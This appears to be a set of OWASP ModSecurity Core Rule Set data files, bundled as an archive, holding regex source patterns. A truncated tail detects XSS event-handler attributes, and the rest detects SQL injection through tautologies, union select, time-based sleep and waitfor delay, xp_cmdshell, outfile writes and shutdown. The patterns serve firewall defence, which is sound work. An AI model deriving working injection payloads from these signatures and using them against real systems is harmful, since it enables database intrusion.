(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseup[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousewheel[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmove[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoveend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmovestart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozfullscreenerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkdownload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoznetworkupload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozorientationchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmozpointerlockerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmoztimechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnomatch[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onnoupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onobsolete[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoffline[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ononline[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onopen[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflow[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onoverflowchanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpagehide[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpageshow[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaint[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpaste[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpause[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplay[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onplaying[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopstate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphidden[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopuphiding[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshowing[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpopupshown[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onprogress[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onpropertychange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onratechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreadystatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreceived[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onremovetrack[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeatEvent[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrepeat[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onreset[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresize[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresult[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresume[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onresuming[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onretrieving[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowenter[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowexit[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsdelete[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onrowsinserted[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onscroll[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseekcomplete[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeked[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onseeking[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselect[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onselectstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsending[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsent[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onset[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onshow[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsoundstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onspeechstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstalled[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstatuschanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstkcommand[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstksessionend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onstop[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsubmit[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuccess[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onsuspend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontext[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeout[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontimeupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchcancel[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchenter[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchleave[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchmove[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontouchstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitioncancel[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ontransitionrun[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunderflow[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onunload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupdateready[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onupgradeneeded[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onuserproximity[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onussdreceived[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onversionchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvoicechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onvolumechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwaiting[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwarning[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onwheel[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onzoom[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ping[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)src[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)style[\s\x08]*?= ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942120.data���������������������������������������0000664�0000000�0000000�00000000336�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\!\= \&\& \|\| >> << >= <= <> <=> \bxor\b \bregexp\b regexp\s+binary \bisnull\b \brlike\b rlike\s+binary not\s+between\s+0\s+and is\s+null like\s+null ^in[+\s]*\([\s\d\"]+[^()]*\) \Win[+\s]*\([\s\d\"]+[^()]*\) <>\s+binary ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942130.data���������������������������������������0000664�0000000�0000000�00000002120�14461225151�0023577�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?=[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=>[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?like[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?rlike[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?sounds\s+like[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?regexp[\s'\"`()]*?(?:\b\1\b) [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?!=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>=[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<>[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?<[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?>[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?\^[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?is\s+not[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+like[\s'\"`()]*?(?!\b\1\b)[\d\w]+ [\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?not\s+regexp[\s'\"`()]*?(?!\b\1\b)[\d\w]+ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942140.data���������������������������������������0000664�0000000�0000000�00000000566�14461225151�0023614�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������database\W*\( db_name\W*\( information_schema\b master\.\.sysdatabases\b msdb\b msysaccessobjects\b msysaccessstorage\b msysaccessxml\b msysaces\b msysmodules2\b msysmodules\b msysobjects\b msysqueries\b msysrelationships\b mysql\.db\b northwind\b pg_catalog\b pg_toast\b schema_name\b schema\W*\( sqlite_master\b sqlite_temp_master\b sysaux\b sys\.database_name\b tempdb\b ������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942150.data���������������������������������������0000664�0000000�0000000�00000003675�14461225151�0023621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������abs acos adddate addtime aes_decrypt aes_encrypt ascii asciistr asin atan atan2 avg benchmark bin bin_to_num bit_and bit_count bit_length bit_or bit_xor cast ciel cieling char_length char character_length charset chr coalesce coercibility collation compress concat_ws concat connection_id conv convert_tz convert cos cot count dcount cr32 curdate current_date current_time current_timestamp current_user curtime database date date_add date_format date_sub datediff day dayname dayofmonth dayofweek dayofyear decode default degrees des_decrypt des_encrypt dump elt encode encrypt exp export_set extract extractvalue field field_in_set find_in_set floor format found_rows from_base64 from_days from_unixtime get_format get_lock greatest group_concat hex hextoraw rawtohex hour if ifnull in inet6_aton inet6_ntoa inet_aton inet_ntoa insert instr interval isnull is_free_lock is_ipv4_compat is_ipv4_mapped is_ipv4 is_ipv6 is_not_null is_not is_null is_used_lock last last_day last_inser_id lcase least left length ln load_file local localtimestamp locate log log2 log10 lower lpad ltrim make_set makedate master_pos_wait max md5 microsecond mid min minute mod month monthname name_const not_in now nullif oct octet_length old_password ord password period_add period_diff pi position pow power procedure_analyse quarter quote radians rand release_lock repeat replace reverse right round row_count rpad rtrim schema sec_to_time second session_user sha sha1 sha2 sign sin pg_sleep sleep soundex space sqrt std stddev_pop stddev_samp str_to_date strcmp subdate substring substring_index substr subtime sum sysdate system_user tan time timestamp timestampadd timestampdiff timediff time_format time_to_sec to_base64 todays toseconds tochar tonchar trim truncate ucase uncompress uncompressed_length unhex unix_timestamp updatexml upper user utc_date utc_time utc_timestamp uuid uuid_short values var_pop var_samp variance version week weekday weekofyear weight_string year yearweek xmltype �������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942170.data���������������������������������������0000664�0000000�0000000�00000000313�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������select\s+benchmark\s*?\(\s*?[(]?\s*?\w+ ;\s+benchmark\s*?\(\s*?[(]?\s*?\w+ select\s+if\s*?\(\s*?[(]?\s*?\w+ ;\s+if\s*?\(\s*?[(]?\s*?\w+ select\s+sleep\s*?\(\s*?[(]?\s*?\w+ ;\s+sleep\s*?\(\s*?[(]?\s*?\w+ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942180.data���������������������������������������0000664�0000000�0000000�00000001203�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\d[\"'`]\s+[\"'`]\s+\d ^admin\s*?[\"'`] (?:/\*)+[\"'`]+\s? (?:/\*)+[\"'`]+\s?-- (?:/\*)+[\"'`]+\s?# (?:/\*)+[\"'`]+\s?/\* (?:/\*)+[\"'`]+\s?{ [\"'`]\s*?or[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?xor[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?div[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?like[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?between[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?and[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`] [\"'`]\s*?[^\w\s]?=\s*?[\"'`] [\"'`]\W*?[+=]+\W*?[\"'`] [\"'`]\s*?[!=|][\d\s!=+-]+.*?[\"'`(].*?$ [\"'`]\s*?[!=|][\d\s!=]+.*?\d+$ [\"'`]\s*?like\W+[\w\"'`(] \sis\s*?0\W where\s[\s\w\.,-]+\s= [\"'`][<>~]+[\"'`] ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942190.data���������������������������������������0000664�0000000�0000000�00000000722�14461225151�0023613�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\"'`]\s*?!\s*?[\"'`\w] [\"'`];?\s*?having\b\s*?[^\s] [\"'`];?\s*?select\b\s*?[^\s] [\"'`];?\s*?union\b\s*?[^\s] \s*?exec.*?\Wxp_cmdshell \s*?execute.*?\Wxp_cmdshell \wiif\s*?\( connection_id\s*?\([^\)]*? current_user\s*?\([^\)]*? database\s*?\([^\)]*? exec\s+master\. execute\s+master\. from\W+information_schema\W into[\s+]+dumpfile\s*?[\"'`] into[\s+]+outfile\s*?[\"'`] schema\s*?\([^\)]*? select.*?\w?user\( union select @ union[\w(\s]*?select user\s*?\([^\)]*? ����������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942200.data���������������������������������������0000664�0000000�0000000�00000000620�14461225151�0023600�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������,.*?[)\da-f\"'`][\"'`][\"'`].*?[\"'`] ,.*?[)\da-f\"'`][\"'`](?:\r?\n)?\z ,.*?[)\da-f\"'`][\"'`][^\"'`]+ \Wselect.+\W*?from select\s*?\(\s*?space\s*?\( create\s*?\(\s*?space\s*?\( rename\s*?\(\s*?space\s*?\( truncate\s*?\(\s*?space\s*?\( load\s*?\(\s*?space\s*?\( alter\s*?\(\s*?space\s*?\( delete\s*?\(\s*?space\s*?\( update\s*?\(\s*?space\s*?\( insert\s*?\(\s*?space\s*?\( desc\s*?\(\s*?space\s*?\( ����������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942210.data���������������������������������������0000664�0000000�0000000�00000002014�14461225151�0023600�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������@.+=\s*?\(\s*?select \d\s*?or\s*?\d+\s*?[\-+] \d\s*?xor\s*?\d+\s*?[\-+] \d\s*?div\s*?\d+\s*?[\-+] \d\s*?like\s*?\d+\s*?[\-+] \d\s*?between\s*?\d+\s*?[\-+] \d\s*?and\s*?\d+\s*?[\-+] \/\w+;?\s+having\W \/\w+;?\s+and\W \/\w+;?\s+or\W \/\w+;?\s+xor\W \/\w+;?\s+div\W \/\w+;?\s+like\W \/\w+;?\s+between\W \/\w+;?\s+select\W \d\s+group\s+by.+\( ;\s*?drop #\s*?drop --\s*?drop ;\s*?alter #\s*?alter --\s*?alter ;\s*?update\s*?\w{2,} #\s*?update\s*?\w{2,} --\s*?update\s*?\w{2,} ;\s*?insert\s*?\w{2,} #\s*?insert\s*?\w{2,} --\s*?insert\s*?\w{2,} [^\w]SET\s*?@\w+ and[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] nand[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] or[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] xor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] xxor[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] div[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] like[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] not[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] \|\|[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] \&\&[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942240.data���������������������������������������0000664�0000000�0000000�00000000244�14461225151�0023606�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������alter\s*?\w+.*?character\s+set\s+\w+ alter\s*?\w+.*?char\s+set\s+\w+ [\"'`];*?\s*?waitfor\s+time\s+[\"'`] [\"'`];*?\s*?waitfor\s+delay\s+[\"'`] [\"'`];.*?:\s*?goto ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942260.data���������������������������������������0000664�0000000�0000000�00000001527�14461225151�0023615�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������union\s*?\s*?[([]*?\s*?select\s+ union\s*?all\s*?[([]*?\s*?select\s+ union\s*?distinct\s*?[([]*?\s*?select\s+ union\s*?[(!@]*?\s*?[([]*?\s*?select\s+ \w\s+like\s+[\"'`] like\s*?[\"'`]\% [\"'`]\s*?like\W*?[\"'`\d] [\"'`]\s*?and\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?nand\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?or\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?xor\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?xxor\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?div\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?like\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?between\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?not\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?\|\|\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?\&\&\s+[\s\w]+=\s*?\w+\s*?having\s+ [\"'`]\s*?\*\s*?\w+\W+[\"'`] [\"'`]\s*?[^?\w\s=.,;)(]++\s*?[(@\"'`]*?\s*?\w+\W+\w select\s+?[\[\]()\s\w\.,\"'`-]+from\s+ find_in_set\s*?\( �������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942280.data���������������������������������������0000664�0000000�0000000�00000000226�14461225151�0023612�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������select\s*?pg_sleep waitfor\s*?delay\s?[\"'`]+\s?\d ;\s*?shutdown\s*?; ;\s*?shutdown\s*?-- ;\s*?shutdown\s*?# ;\s*?shutdown\s*?\/\* ;\s*?shutdown\s*?{ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942300.data���������������������������������������0000664�0000000�0000000�00000000444�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\)\s*?when\s*?\d+\s*?then [\"'`]\s*?# [\"'`]\s*?-- [\"'`]\s*?{ \/\*!\s?\d+ char\s*?\(\s*?\d chr\s*?\(\s*?\d and\s+\s*?\w+\( nand\s+\s*?\w+\( or\s+\s*?\w+\( xor\s+\s*?\w+\( xxor\s+\s*?\w+\( div\s+\s*?\w+\( like\s+\s*?\w+\( between\s+\s*?\w+\( not\s+\s*?\w+\( \|\|\s+\s*?\w+\( \&\&\s+\s*?\w+\( ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942310.data���������������������������������������0000664�0000000�0000000�00000000464�14461225151�0023610�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\"'`]\s+and\s*?=\W \(\s*?select\s*?\w+\s*?\( \*\/from \+\s*?\d+\s*?\+\s*?@ \w[\"'`]\s*?(?:[-+=|@]+\s+?)+[\d(] \w[\"'`]\s*?[-+=|@]+[\d(] coalesce\s*?\( @@\w+\s*?[^\w\s] \W!+[\"'`]\w [\"'`];\s*?if [\"'`];\s*?while [\"'`];\s*?begin [\"'`][\s\d]+=\s*?\d order\s+by\s+if\w*?\s*?\( [\s(]+case\d*?\W.+[tw]hen[\s(] ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942320.data���������������������������������������0000664�0000000�0000000�00000000301�14461225151�0023577�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������create\s+function\s*?\w+\s*?\(\s*?\)\s*?- create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?- declare[^\w]+[@#]\s*?\w+ exec\s*?\(\s*?@ procedure\s+analyse\s*?\( ;\s*?declare\s+[\w-]+ ;\s*?open\s+[\w-]+ �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942330.data���������������������������������������0000664�0000000�0000000�00000003451�14461225151�0023611�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\"'`]\s*?or\s*?[\"'`]?\d [\"'`]\s*?xor\s*?[\"'`]?\d [\"'`]\s*?div\s*?[\"'`]?\d [\"'`]\s*?like\s*?[\"'`]?\d [\"'`]\s*?between\s*?[\"'`]?\d [\"'`]\s*?and\s*?[\"'`]?\d \\\\x(?:23|27|3d) ^.?[\"'`]$ ^[\"'`\\\\]*?[\d\"'`]+\s*?and\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?nand\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?or\s*?[\w\"'`][+&!@(),.-] 